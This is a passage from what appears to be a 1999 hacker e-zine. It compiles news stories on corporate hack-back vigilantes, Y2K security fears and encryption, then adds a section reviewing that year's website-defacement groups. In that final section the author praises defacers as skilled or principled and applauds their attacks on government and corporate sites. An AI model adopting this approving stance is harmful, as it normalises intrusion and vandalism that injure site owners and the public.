lesson. He gives the machines back after recovering any stolen information "I am engaged in the protection and regaining of stolen assets because of the inability of government to provide adequate protection and prosecution," Cipher says. And that includes, he admits, breaking laws himself. His defense: "It's self-defense. "You can call the FBI right now and say a person just got off with a database of customers. What is the FBI going to do?" Giving Feds the fits The increase in technology crime has given fits to law enforcement agencies who find they don't have the necessary skills to keep up with an army of new criminals, emboldened by the anonymity the Net provides. Even when federal agents act, justice can be slow. It took almost six months for the recent nationwide FBI hacker "crackdown" to produce an arrest. So Cipher, and some say other such corporate vigilantes, take the law into their own hands. Still, to call breaking into someone else's home an act of corporate self-defense would likely be considered a stretch in court. "I don't see that argument holding water," said cyberlaw expert Dorsey Morrow. "It would be a dangerous thing for a corporation to do. The potential liability is incredible." Particularly if vigilantes hit the wrong target. That's the concern of computer consultant Brian Martin, who maintains the popular hacker information site "attrition.org." "So Lou and his gang roll up on this house and know the intruder dialed from there. They bust in and terrorize an elderly couple. Oops!" Martin said. "How could they have been so wrong? Because the hacker used a laptop from the phone box outside their house. That scenario scares me." First identified in a column Cipher was first identified in public when information warfare expert Winn Schwartau used his name in a column for Network World in January. Claims of baseball bat-wielding vigilantes stirred skepticism in the underworld, and neither Martin nor Space Rogue, who maintains the Hacker News Network Web site, say they've ever heard of a hacker being visited by any private security agent. "Considering the size of this community, if he has visited more than 10 people I am sure word would have leaked," Rogue said. But he added "There have been rumors floating around for a few years of corporations with their own internal security taking matters into their own hands." That has law enforcement agencies anxious enough to discuss the matter publicly. Jim Christy, special agent for the Department of Defense, debated Schwartau on the topic at the Infowarcon conference earlier this month. "I have no problem with identifying a bad guy and warning them," said Christy, who for 11 years was chief of computer crime for the Air Force Office of Special Investigations. "That's a legitimate self-defense option for a victim. But it crosses the line when you violate the rights of others. ... It crosses the line when you break the law." Rely on informants He said the key to making law enforcement agencies more effective is for more victims of computer crime to come forward. Without a backlog of cases, agents can't demand additional resources. Companies that hire vigilantes, or who simply brush computer crime under the rug out of fear of embarrassment, only make the situation worse, he said. But that won't help victims today, Schwartau said, and they need somewhere to turn. "The legal community says it's blatantly illegal," Schwartau said. Schwartau, who once shared ownership of a Web site venture with Cipher, says the legal community is being closed-minded on the topic. "Is disarming an adversary illegal? ... You're allowed to do repossession, which is stealing your own possessions back." When MSNBC visited Cipher at his daytime consulting job, where he is a security adviser for a large U.S. brokerage company, Cipher said he painstakingly verfies his targets and admits sometimes he doesn't catch them. Most of the examples he offered involved pre-emptive strikes against hackers "probing" financial networks - the cyber equivalent of "casing" a bank before a robbery. Such pre-emptive strikes have taken him as far as Eastern Europe, and even India, he said. In one case, he said college-aged hackers in hte Czech Republic were worming their way toward a bank's credit card database. Another incident involved hackers in India trying to fake an electronic funds transfer. But sometimes, he said, he does his work entirely over the Internet. Last month he says his agents broke into the computer of a man who held a vast database of stolen credit cards. They scrambled the card numbers to render them useless. Many more of his stories are less dramatic, involving a polite curbside or coffeehouse conversation with a hacker. Often, that's enough, he says. "They are very surprised when we come to visit, when we bridge to the physical world," he said. Desperate countdown to ready Cold War remnants for Y2K ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ All but one of the seven Cold War-era "hot lines" have year 2000 glitches, and the United States and Russia are hurrying to correct them, a top Pentagon official said today. The Clinton administration is giving Moscow Y2K-compliant software and computers "to correct program deficiencies in outage reporting, monitoring, and channel reroute operations," assistant secretary of defense Edward Warner said. He made the remarks in testimony prepared for the Senate Special Committee on Y2K. The panel is studying pitfalls of the coding glitch that could cause ill-prepared computers--and the operations they control--to fail on January 1 with the changeover from 1999 to 2000. To avoid possible misunderstandings during the date change, the United States and Russia agreed on September 13 to set up a joint "Center for Y2K Strategic Stability" at Peterson Air Force Base in Colorado Springs, Colorado. Sharing information In addition to sharing missile launch information, Russian and U.S. officers staffing the post will be able to talk through any other "defense-related problems that emerge" during the calendar rollover, Warner said. He said the Pentagon had begun the process of procuring updated equipment for the six of seven hot lines found to have problems, "and while the schedule is tight, we are confident that the fixes will be installed and tested by December." "Assured communications between U.S. and Russian leaders is a priority at all times, and of particular concern over the millennium date change," said Warner, who is responsible for strategy and threat reduction. The United States and Russia each keep roughly 2,500 nuclear-tipped missiles pointed at one another on hair-trigger alert despite the collapse of the old Soviet Union in December 1991, ending the Cold War. Immediate communication They began installing the seven direct communications links, popularly known as hot lines, at the height of the Cold War in the 1960s to guarantee immediate communication when needed. Among these are: direct links between the two presidents; a link between the secretary of state and the foreign minister; and one connecting nuclear risk-reduction center on both sides. A secure communications link also is key to operations of the temporary Center for Y2K Strategic Stability. Russia put on hold most Y2K-related fixes and other technical cooperation with the United States after U.S.-led NATO forces began a 78-day air war in March in Yugoslavia, a Russian ally. When talks resumed in August, Russia agreed with U.S. recommendations regarding "Y2K vulnerabilities in current hot line architecture," Warner said. He said Y2K problems had been identified at a Russian ground station as well as in commercial software used on both sides, "which would prevent full operation of six of the seven direct communications links over the Y2K transition." Among the contingency plans now being discussed were the possible addition of "backup analog circuits, additional secure phone/facsimile capability, and installation of emergency INMARSAT (mobile satellite communications) devices on both sides," Warner said. Critical issues Another "critical" Y2K-related issue is the security of Russia's nuclear stockpiles, Warner told the committee headed by Utah Republican Robert Bennett and Connecticut Democrat Chris Dodd. "Of special concern are the security systems in nuclear storage sites affecting access control, perimeter monitoring, fire detection and suppression, and warhead inventory and accountability," he said. Forces of the 12th Main Directorate of the Russian Defense Ministry, responsible for the storage and security of non-deployed Russian nuclear warheads, are to maintain a "special Y2K monitoring and control center" at each of their 50 main nuclear storage sites in December through March 2000, Warner said. Under its so-called Cooperative Threat Reduction program, the United States has spent millions of dollars since the end of the Cold War aimed at preventing Russian nuclear material from being purchased or stolen by guerrilla groups or third countries. Computer wizards crack code in worldwide challenge ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Computer wizards from 20 countries joined together to crack a high-powered secret code, winning a prestigious prize from a Canadian software firm seeking to establish a worldwide standard for encrypting data used in Internet transactions. A team led by Robert Harley, of France's National Institute for Research in Computer Science and Control (INRIA), won the five-thousand-dollar award after a 40-day effort to solve the puzzle, the firm Certicom said Wednesday. Harley coordinated a mammoth calculating programme that occupied 195 researchers in 20 countries, using 740 computers to run 130,000 billion computations, it said in a press release received here. The challenge centered on so-called "public key" cryptography. Under this, two computers that have never previously communicated agree on a joint key that will decipher coded data. The goal is to ensure that the key cannot be decoded, even if someone taps into the traffic -- thus ensuring that credit-card numbers and other data sent in electronic commerce cannot be intercepted and misused. Certicom's challenge related to a logarithmic programme, called elliptic curve cryptography (ECC), that it hopes to have established as an Internet standard for encrypted codes. It contends that ECC, a newcomer to the field, is more secure than more widely-used rival concepts, uses up less computer memory and gobbles up less bandwidth in the communications link. Specifically, cryptographers were asked to crack a 97-bit key that was encoded in ECC. They took twice as much computing power to achieve the goal as a 512-bit key in a rival encryption made by RSA Data Security, Certicom said. The result also showed that "strong security" can be achieved only when a much more powerful key -- a minimum of 163 bits in ECC code -- is used, Certicom said. The code-crackers included reseachers in Australia, Austria, Britain and the United States. They have agreed to donate 4,000 dollars of the prize money to the Free Software Foundation, an organisation that encourages the creation of free software. The remaining 1,000 dollars will go to an Australian member of the team, Paul Bourke, who made the breakthrough in the calculation. Bourke used computers at Australia's Swinburne University that are mainly used for studying pulsars. U.S. finds malicious code changes in Y2K "fixes" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Malicious changes to computer code under the guise of Year 2000 software fixes have begun to surface in some U.S. work undertaken by foreign contractors, the top U.S. cybercop said yesterday. "We have some indications that this is happening" in a possible foreshadowing of economic and security headaches stemming from Y2K fixes, Michael Vatis of the Federal Bureau of Investigation told Reuters. Vatis heads the interagency National Infrastructure Protection Center (NIPC), responsible for detecting and deterring cyberattacks on networks that drive U.S. finance, transport, telecommunications, and other vital sectors. A Central Intelligence Agency officer assigned to the NIPC said recently that India and Israel appeared to be the "most likely sources of malicious remediation" of U.S. software. "India and Israel appear to be the countries whose governments or industry may most likely use their access to implant malicious code in light of their assessed motive, opportunity, and means," the CIA officer, Terrill Maynard, wrote in the June issue of Infrastructure Protection Digest. A significant amount of Y2K repair is also being done for U.S. companies by contractors in Ireland, Pakistan, and the Philippines, according to Maynard. But they appear among the "least likely" providers to jeopardize U.S. corporate or government system integrity, although the possibility cannot be ruled out, he wrote. Thousands of companies in the United States and elsewhere have contracted out system upgrades to cope with the anticipated Y2K glitch, which could scramble computers when 1999 gives way to 2000. The CIA declined to comment on Maynard's article. Referring to it, Vatis said, "This is our effort to [give] the public information that hopefully can be useful to people." Vatis, interviewed at FBI headquarters, said that so far "not a great deal" of Y2K-related tampering had turned up. "But that's largely because, No. 1, we're really dependent on private companies to tell us if they're seeing malicious code being implanted in their systems," he said. In reporting evidence of possible Y2K-related sabotage of software, Vatis confirmed one of the worst long-term fears of U.S. national security planners. "A tremendous amount of remediation of software has been done overseas or by foreign companies operating within the United States," Vatis said. He said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road. This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of data, Vatis said. The Senate Y2K Committee, in its final report last week, described the issue as "unsettling." "The effort to fix the code may well introduce serious long-term risks to the nation's security and information superiority," said the panel headed by Sens. Robert Bennett (R-Utah) and Chris Dodd (D-Connecticut). Vatis, in testimony before the Y2K panel in July, warned that contractors could compromise systems by installing "trap doors" for anonymous access. By implanting malicious code, he said, a contractor could stitch in a "logic bomb" or a time-delayed virus that would later disrupt operations. Another possible threat is the insertion of a program that would compromise passwords or other system security, he said. The Senate Y2K Committee said the long-term consequences could include increased foreign intelligence collection and espionage activity, reduced information security, a loss of economic advantage, and increased infrastructure vulnerability. financial firms create Net crime watch ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Treasury Department, major banks, and investment firms today inaugurated an Internet crime watch center that's intended to share confidential information on cyberthreats to the financial industry. The Financial Services Information Sharing and Analysis Center is intended to detect attacks from hackers and others on computer systems, and to provide rapid and anonymous notification between banks and other institutions when there is a threat. "New types of crime require new types of solutions," Treasury Secretary Lawrence Summers said. Citigroup, Bank of America, Merrill Lynch, J.P. Morgan, and mutual fund giants Vanguard and Fidelity are among the program participants. The firms are prohibited from sharing confidential customer information. A survey by the Computer Security Institute found that 64 percent of the companies it questioned reported security breaches to computer systems in 1998, up from the number of firms reporting breaches in 1997, Summers said. "As damaging as these attacks have been, the vast majority has been conducted by disgruntled individuals," Summers said. "We face a future, though, where criminals, terrorists, or even nation states may use the same tools in a more organized way for darker purposes." President Bill Clinton, in an executive order issued in May 1998, directed the Treasury to pursue the project. The center itself is funded by the participating banks and financial institutions and managed by a private contractor. Other federal agencies are participating in the effort. "This is a step in the right direction," said Arthur Levitt, chairman of the Securities & Exchange Commission. "It's a whole new world in terms of security." The program will also help banks coordinate information during the Year 2000 computer rollover, according to Federal Reserve Governor Roger Ferguson. "The creation of the center couldn't come at a more opportune time," Ferguson said in a printed statement. Last month, computer security product maker Network Associates warned that a computer virus that deletes a computer user's files was spreading through computer systems at major financial institutions. The bug, dubbed the "Thursday" virus, is programmed to delete files on December 13, 1999, Network Associates said. The virus attacks Microsoft Windows Word 97 files. Users won't know they are infected until December 13, the company said. The problem isn't restricted to the financial industry or the United States. Just today, Electrabel, Belgium's biggest electricity company, said it successfully warded off an attempt by a computer hacker to infiltrate its system. Police are investigating the incident, which follows successful computer system break-ins in Belgium at Fortis Bank and at Belgacom's Skynet Internet service in August by a hacker who dubbed himself "Redattack." SEC investigates NetRoadshow security breach ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yahoo's NetRoadshow unit discovered a security breach that could have let unauthorized Internet users see information about securities offerings, drawing questions from regulators about the cause of the problem. NetRoadshow is a pioneer in the business of using the Internet to broadcast sessions that companies hold for institutional investors before stock and bond offerings. Only financial institutions and other sophisticated investors with passwords are supposed to have access to the online meetings, known as roadshows. Until yesterday afternoon, however, anyone could view parts of sessions that the company has broadcast by entering the company's Web site through an Internet address that NetRoadshow's employees use to make technical changes to the site. The company said the problem was caused by human error. About a dozen people had gotten into the system yesterday before NetRoadshow found out about the problem and blocked access, the company said. A Yahoo official said the company doesn't know how long the system had been open. "The problem was resolved immediately yesterday when we found out about it," said Yahoo spokeswoman Sherry Manno. "The breach occurred in our system that receives transferred files and is structured for internal use, not the system investors use." The Securities and Exchange Commission, which lays out rules for companies issuing stock and limits the audience of both traditional face-to-face road shows and online sessions, said it learned about the security breach yesterday and plans to talk to NetRoadshow about the issue. "We're going to ask questions about what's going on," said SEC deputy corporation finance director Michael McAlevey. "If it was an inadvertent technical problem, it's less of a concern to us than if it was intentional." SEC rules seek to prevent executives from hyping their business expectations before an offering or discussing the company beyond the information it has included in its prospectus, which is available to the public. The SEC allows road shows--where underwriters and issuers orally describe the company and try to build interest in the stock before pricing the offering--because they involve a limited audience of sophisticated investors. The SEC gave its blessing to the Internet-transmitted road show in 1997, when the agency's staff sent "no action" letters to NetRoadshow and the MSNBC cable network, a joint venture of Microsoft and General Electric's NBC television network. They had requested approval to broadcast road shows over the Internet or via MSNBC's Private Financial Network. The SEC said it wouldn't recommend charges for transmitting the sessions over the Internet, though the agency reserved the right to look at the issue again in the future. In the July 30, 1997, letter to NetRoadshow, the SEC said: "Since regulatory responses to legal issues raised by technological developments may evolve, you should be aware that this no-action position may be reevaluated in the future." NetRoadshow was acquired in March by Broadcast.com, which then was bought by Yahoo in July. Bloomberg, the parent of Bloomberg News, competes with NetRoadshow and several other firms in the business of transmitting road show presentations. Court to revisit encryption ruling ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A U.S. federal appeals court will reexamine a trial court's decision to lift U.S. government restrictions on the export of encryption technology. The 9th U.S. Circuit Court of Appeals withdrew a May decision by a panel of three of its judges, which had endorsed the trial court ruling. That indicates that a majority of the active 9th Circuit judges have reservations about the opinion or feel the encryption issue is significant enough to be revisited. In May, the panel of 9th Circuit judges concluded that the federal government could not limit professor Daniel J. Bernstein's efforts to distribute encryption software. Many companies, such as Network Associates, have been prevented by U.S. law from selling data-scrambling technology overseas. Earlier this month, it was reported that the Clinton administration is easing restrictions on data-scrambling technology, clearing the way for Network Associates and other companies to sell the hardest-to-crack encryption technology. Microsoft Patches IE Security.....Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Latest fix eliminates ways that site operators can control your PC. Microsoft claims to have really done it this time. The company promises that it has completely eliminated the security problems that existed with Internet Explorer with the release of an updated patch for the browser software. An initial patch announcement was made on September 10, but the patch available as of late last week is more far-reaching, Microsoft said in a statement posted Friday on its security Web site. The security holes in Internet Explorer were discovered earlier this month. The patch eliminates the "ImportExportFavorites" vulnerability, which affected computers connected to the Internet, Microsoft says. The security hole made it possible for a Web site operator to carry out any functions that visitors to a Web site could do on their own computers, such as deleting or modifying files or reformatting the hard drive. It derived from a feature in IE 5 that lets users export a list of their favorite Web sites to a file, or import a file with a list of favorite Web sites. The new patch also plugs security holes that resulted from several ActiveX controls, Microsoft says. These existed both in versions 4.01 and 5 of Internet Explorer. The ActiveX weakness allowed hackers to manipulate programs on a user's computer when they visited a Web page or received e-mail via Microsoft's Outlook program. Justice Dept. Funds Antihacking Campaign ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Justice Department is trying to save children before they turn into hackers. With its $300,000 funding of the Cybercitizen Partnership, an awareness campaign coordinated by the Information Technology Association of America, the Justice Department assumes the unusual role of helping to educate budding Web users about how to be responsible, law-abiding surfers. The Cybercitizen Partnership, announced in March, is a joint Justice-ITAA effort aimed at protecting the country's Internet infrastructure from outlaw hackers and other criminals. Faced with a security breach, law enforcement officials don't know at first if they're confronting a foreign terrorist, a college student or a couple of sixth-graders who are having some fun with Dad's computer. But an ITAA official said that, upon investigation, a surprising number of cases involve child hackers. The association says that information technology makes up about 6 percent of the global gross domestic product some $1.8 trillion of electronic infrastructure that needs to be protected against disgruntled former employees, corporate spies and juvenile delinquents who like to pull pranks. Figuring that it's too late to reform terrorists and spies, the ITAA decided to concentrate on the kids. The campaign, which debuts in January, will initially target children 12 and under, aiming to teach them proper online behavior and to instill a healthy disdain for hacking. The association wants to "help weed out some of the less meaningful system violations by curious children so that law enforcement can focus on the true criminals," says ITAA President Harris Miller. The cash infusion from the Justice Department is in keeping with a long tradition of government-sponsored public education campaigns, from the Interior Department's Smokey the Bear messages against forest fires to the Drug Enforcement Administration's "Just Say No" war on drugs. Miller says the campaign could be expanded to educate kids about other aspects of proper Internet etiquette, such as warning them against sending spam for kids, the modern-day equivalent of prank telephone calls or visiting Web sites with adult content. The main focus of the campaign, however, will be to "send the message that hacking isn't cute, clever or funny." In addition to the funding from Justice, the ITAA also plans to pass the hat among its own membership, a who's-who list of the high-tech industry that includes Microsoft (MSFT) , America Online (AOL) and IBM (IBM) . The association will also seek funds from foundations and possibly from private individuals. The association has sent out a request to several public relations companies for ideas on how to run the campaign, which might include television and Internet advertising, brochures and even visits to schools. One possibility under consideration: the creation of a mascot, like the famous McGruff crime dog, to pass the message along in a friendly manner. Quantum confidential ~~~~~~~~~~~~~~~~~~~~ Want to beat the hackers once and for all? As Simon Singh finds out, the enigmatic quantum world is about to make your secrets safe as houses IT COULD HAPPEN in a few months or a few years. But sooner or later, a mathematician could make a discovery that jeopardises international security, threatens the future of Internet commerce, and imperils the privacy of e-mails. Today's codes and ciphers are good, to be sure. But it is probably only a matter of time before they become useless. With the coming of the information age, we rely ever more heavily on cryptography to protect us from snoopers, cyber-crooks and Big Brother. Some of today's most secure codes exploit the fact that while it is easy to multiply two prime numbers together, it is almost impossible to start with the answer and work out which two primes were used to create it. But the day a mathematical genius discovers a short cut for finding the hidden prime numbers, these codes will crumble. What everyone is looking for is a new form of code, one that is truly unbreakable. That's where the quantum world comes in. Exploiting the strange uncertainties of quantum physics can give you a code that nobody--no matter how clever--will ever be able to crack. That's the theory. The trouble comes when you try putting it into practice. When quantum particles interact with the large-scale world they tend to lose the delicate information they contain. This makes it fiendishly difficult to use them to send information over any sensible distance. Difficult, but not impossible. In the past few years, researchers have succeeded in sending quantum-encrypted messages tens of kilometres down optical fibres. Now the challenge is to find a way to send quantum-encrypted information through the air. This will open the way to fully secure global communications, beamed up to an orbiting satellite and forwarded to any place on Earth. It's a phenomenal technical problem, but this year researchers at the Los Alamos National Laboratory in New Mexico achieved a breakthrough that looks set to transform the way we keep our secrets. Online Credit Card Security Fears Waning, But Still a Factor ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A new report by Forrester Research, Inc. found that despite growing consumer comfort with online credit purchasing, the fear of using plastic on the Internet is still the largest obstacle to e-commerce. According to the report, consumer worries about credit card security have been dropping since early 1998. Forrester examined this trend through three surveys: 120,000 households interviewed in early 1998, 95,000 households in early 1999 and 10,000 online households in July 1999. Consumer Concern Has Fallen In 1998, just 15 percent of online households felt safe using their credit cards for online purchases. In the most recent study, this number rose to 53 percent. Furthermore, the percentage of consumers who feel that the Internet is not a secure place to use a credit card has plummeted from 71 to 40 percent. The survey also found that the longer consumers are online, the more comfortable they become with credit card security. However, this fact alone doesn't explain the waning security fears: 71 percent of consumers who were online for 6 to 12 months in January 1999 felt insecure using credit cards via the Internet. By July, this percentage dropped by 53 percent for consumers who were online for the same length of time. Security Fears Still Choke E-Commerce While security fears plummet, Forrester's survey found that 83 percent of consumers who have never shopped online still cite concerns over credit card security as the main reason for not buying online. According to Forrester, these consumers are driven by a fear of technology snafus and untrustworthy e-tailers. The primary worry is that credit card information can be stolen during transmissions from a PC to an e-tailer. Additionally, 79 percent of those surveyed said that they didn't trust online merchants to safeguard this information -- while 53 percent feared giving their card numbers to e-tailers with no brick-and-mortar presence. Nonetheless, general apprehension or bad experiences aren't entirely to blame. Forrester discovered that just 25 percent of skeptics say that they are generally wary when using a credit card for any type of purchase. A small group -- 4 percent -- points to a prior bad experience as the reason for not buying online. How Can It Be Fixed? Forrester asked reluctant consumers to identify what would make them more likely to use their credit cards online. After reviewing their answers, Forrester has come up with four ways that e-tailers can lessen consumers reluctance to shop online: Seventy-five percent of the skeptics say that knowing they were using a "secure server site" would make them feel more comfortable. In addition, 48 percent would feel better if e-tailers also had some sort of brick-and-mortar presence to make returns easy. Forty-one percent of those surveyed by Forrester said that they would like to see online merchants adopt a money-back guarantee before they would be willing to use their credit cards online. Finally, 45 percent of the consumers interviewed said that their fears would be eased if e-tailers displayed positive testimonials from satisfied customers on their Web sites. India: Code-Smuggling? Absurd ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Indian officials Friday slammed as ridiculous a suggestion by US officials that Indian Y2K (Year 2000) software firms could have been used to smuggle in computer codes aimed at threatening Washington's security. Michael Vatis, the top cyber cop in the Federal Bureau of Investigation, told Reuters Thursday that malicious code changes under the guise of Y2K modifications had begun to surface in some US work undertaken by foreign contractors. The claim signaled possible economic and security threats. Vatis, who heads the National Infrastructure Protection Center (NIPC), gave no details. But Terrill Maynard, a Central Intelligence Agency officer assigned to the NIPC, said in a recent article that India and Israel appeared to be the "most likely sources" of malicious code. The article appeared in the June issue of Infrastructure Protection Digest. "I think this is an utterly ridiculous assertion ... without, as far as I can see, any basis whatsoever," said Montek Singh Ahluwalia, chairman of the Indian government's Y2K Action Force. "I have no idea if this report is factually correct and if indeed a responsible officer has made what appears to be an irresponsible statement," Ahluwalia told Reuters. He said the Indian government had not received any official communication to suggest wrongdoing by Indian firms or agencies. The CIA declined to comment on Maynard's article. Referring to it, Vatis said: "This is our effort to put out in the public information that hopefully can be useful to people." Indian firms have done more than $2 billion worth of coding work to protect old computers whose date-fields denoted years only by the last two digits. Unless rectified, such computers can cause valuable data crashes when the year 2000 dawns. India and Israel have had differences with the United States on security matters, particularly on nuclear policy. Dewang Mehta, president of India's National Association of Software and Service Companies (NASSCOM), cited several reasons to dismiss suggestions Indian firms may be a security threat. He told Reuters that too much was at stake for India's booming software companies, which have used Y2K as a strategy to gain long-term clients. Besides, Indian firms did the bulk of Y2K work at US sites under client supervision, he added. "We cannot visualize that any moles have been planted. This is absurd. For us, too much is at stake," Mehta said. He said Indian firms had also carried out "regression testing," which was aimed at ensuring Y2K programming work did not hamper other software in client systems. Vatis said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road. This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of data, he said. Vatis said that so far "not a great deal" of Y2K-related tampering had turned up. But a US Senate panel said last week that long-term consequences of using foreign firms for Y2K work could include more espionage and reduced information security. Mehta said he heard during a recent visit to Israel a rumor about a computer virus designed to wipe out Y2K solutions. "I am afraid as only three months are left and many American systems are not compliant, this kind of global rumor-mongering is beginning to happen," he said. We all think we should guard ourselves against it. NASSCOM strongly condemns such rumors." Maynard noted Ireland, Pakistan, and the Philippines among nations whose firms did significant Y2K repair. He said they were "least likely" to harm US systems but did not rule out threat possibilities. 2. S P E C I A L ~~~~~~~~~~~~~~~~~ 2. HACKING IN 1999 | THE CURRENT STATE OF HACKING ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Major Exploits released in 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In 1999, many things have happened, the allaire cold fusion bug has been widely advertised and put to use, many servers were compromised by using it, if you look to allot of the website defacement mirror sites, almost all were done by the cold fusion method. Yet another easy bug has been released in 1999 by eEye Digital Security Team, this bug was for the Microsoft IIS server, and again many people have used this method to make a name for themselves. After looking at exploits like this, it makes you wonder what a hacker is these days? Someone who uses a web browser to hack remote systems? Or is a hacker still defined as it was originally. Hacking is mostly about gaining access to a remote system, not showing off that you outsmarted an admin. Major Incidents that have Affected the 'Scene' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The first major incident the busting of Eric Burns AKA Zyklon. When companies pressed lawsuits against him for thousands of dollars because he broke into their servers.Up to now he is still not allowed to touch a computer I assume. The second incident was the raiding of members of the well known group gH a.k.a global Hell. An approximate 19 people were raided if not more, not only from gH but from other groups such as Level Seven , team spl0it , milw0rm and IL(Iron Lungs) from HcV /Legion2000 and forpaxe . Kevin Mitnick was screwed around 2+ times, with them changing his court date around continuously and him now having to owe 1 mil. Read more about it at 2600 , also support the FREE KEVIN movement. Just recently, a few incidents have happened as a result of John Veransevich otherwise known as JP from AntiOnline . First, Attrition makes a good accusation that JP indeed funded a hacker known as 'so1o' to deface the Senate Government website for him just to make a breaking news story (Although, I am not accusing him of doing this, because it was never proven). Another thing you notice about the "Anti Network" is the AntiCode website, which claims to be "the only place you need" for all of your exploits/network/security tools and utilities. But in reality this site is nothing more than an archive compiled from other known sites and the code ripped by AntiOnline it's self. Second MAJOR incident was when JP shut down a popular IRC server. And the third, probably most devastating to the underground community, was when JP caused Packetstorm Security to shut down, all of Ken Williams files were deleted forever, his work ruined. Not to mention many other things. You can read all those other things at : A few conventions have passed, such as Defcon , Defcon is probably the most recognized of all hacker conventions, this year some major things happened at this convention, they had a line-up of great speakers, Carolyn P. Meinel showed up and was not allowed in because she was accused of not being a 'real' reporter (which I will not comment on), and shortly into the Defcon convention, their website was defaced by the very well know coding group known as ADM. Also Rootfest and the Blackhat Briefings have recently passed by. Who has showed up? ~~~~~~~~~~~~~~~~~~ Many new groups and individuals have showed up in 1999 up to now. To mention a few. and give a decent description of them and their actions + skills. Groups : ~~~~~~~ * Forpaxe - Forpaxe showed up in early 99, they have been responsible for hitting a record number of .edu domains also quite a few .gov/.mil and numerous others. They are well known to all hackers and media. A member of the past groups Legion2000 and HcV was a part of this group in the beginning, Iron Lungs, which later got raided by the FBI. Now it appears to just be 2 individuals (m1crochip/in0de) which they state on all of their webpage defacements. They do what they do for a reason, so they are a decent group of individuals as far as I am concerned. Mirrors of their Website Defacements * Goat Security - This organization is a definite mentionable, everybody knows and remembers the goat team, it consisted of members of gH, HcV and I think even a few from LoU. They defaced a good amount of websites and made a widely known name for themselves. They definitely knew what they were doing, not like all of the CF(cold fusion) kiddies you see around these days. Mirrors of their Website Defacements * gH (global Hell) - Possibly the most world wide known hacker group and most media exposed, gH defaced allot of high profile websites such as Macweek , Peoples Court , The Main Army Page and the Whitehouse . Many members were later raided by FBI agents due to the defacing of the Whitehouse website. They have skill and as far I saw it a very good team of people. This group will always be remembered. Mirrors of their Website Defacements * Level Seven - This crew was responsible for numerous defacements, it is rumored also and stated on some of their defacements that members of this group were a part of gH (global Hell) and got raided. This group was another group that hacked for a decent reason. Mentionable mostly because of their tie-ins with gH. None the less they are a good group. Mirrors of their Website Defacements * Stonehenge Crew - Not very much to say about this group other than they have a purpose for what they do. They always have a reason for defacing a website they hit. They have done around 14 webpage defacements. It is rumored they are also 'tight' with the known group gH. This is another good group. Mirrors of their Website Defacements * Keebler Elves - Well, this group is probably the most skilled up to now in 1999. Many skilled individuals, coders and hacker alike in it, from what is said at least. They are best known for their hacks of the Department of Education , Virgin Records and the Monmouth Army Base . Probably has done the most recognized sites in 1999. And I wouldn't be surprised if they continue to hack big time names. This group deserves allot of respect. Why? Because they aren't like the rest. Mirrors of their Website Defacements * HFD (Hacking for Drunks) - This is another group well known for it's choice of sites to deface. Probably most well recognized for their 20th Century Fox International , Gibson and Blair Witch website hacks. They seem to have a good sense of humor and have done some entertaining defacements. Very good group. But name/logo kind of ripped from HFG(Hacking For Girls) . Mirrors of their Website Defacements * bl0w team - A good Brazilian hackers group, consisting of 5 individuals, best noted for their 2600.co.uk and Telemar hacks. They do it all for an adequate reason and do not give up. I think there patriotism is admirable. They also seem to have a good amount of skill dealing with Solaris/NT systems. Mirrors of their Website Defacements * INDIANHackers/EHA/Ant1 S3cur1ty Tskf0rc3/MST(Moscow Security Team) Nothing special, not really even worth the time, they did a 'few' sites and were never heard from again. None of them had really any reason for defacing websites other than to make themselves look big. Ant1 S3cur1ty Taskf0rc3 did a few with reason, but it was rare with these 4 groups. Mirrors of all the groups defacements : INDIANHackers ] EHA ] Ant1 s3cur1ty taskf0rce ] MST ] -end- Individuals : ~~~~~~~~~~~ * zo0mer - Hit allot of government/military systems and banks. But it appears he removes data from the boxes after he is done. What would be labeled a malacious script kiddie cracker. Mirror of all his/her hacks * p0gO - Probably best known for his defacing of Time Warner San Diego . Not to mention his mass hack, he appears to have good skills, also is recognized for his association with irc.psychic.com . Mirror of all his/her hacks * Xoloth1 - Well known hacker from the Netherlands. Hit some well known porn sites and what would appear to be his spotlight defacement Pentagon.co.yu . Xoloth hacks for all the rite reasons. Mirror of all his/her hacks * v00d00 - First showed up on the scene doing a hack for Psychic , shortly after doing defacements when he was part of the group Defiance it appears. He appears to hack for the freedom of Kevin Mitnick AKA Condor and against war, racism and allot of problems that happen in the world these days. He does it for a good cause. That is all there is to say. Mirror of all his/her hacks * Mozy - Started hacking for irc.psychic.com, later went individual, noted to be good friends with several known hackers. His defacements are quite humorous if you ask me. Keep it up. Mirror of all his/her hacks * dr_fdisk^ - Extremely well known Spanish hacker and for being in the group Raza Mexicana . Most well known for compromising such sites as Nic.bo and HBO, Latin America . Another hacker that does it for the freedom of Kevin Mitnick and many other reasons. Mirror of all his/her hacks There are other individuals I missed and they all deserve respect and to be noticed, I didn't for get them because I dislike them, just because this part of the article has gone far enough. What was hit? ~~~~~~~~~~~~ Aside from all the no-name sites that were hacked. In 1999 there has been several HIGH PROFILE web defacements. Below is a list with a link to the defaced site, provided by Attrition . * Klu Klux Klan * LOD Communication * 200cigarettes Movie * Whitepride * No Limit Records * Hotbot Search Engine * Summercon * eBay * Coca Cola (BE) * US Senate * HBO, Latin America * The White House * Army Main Site and so many more.... Why do they do it? 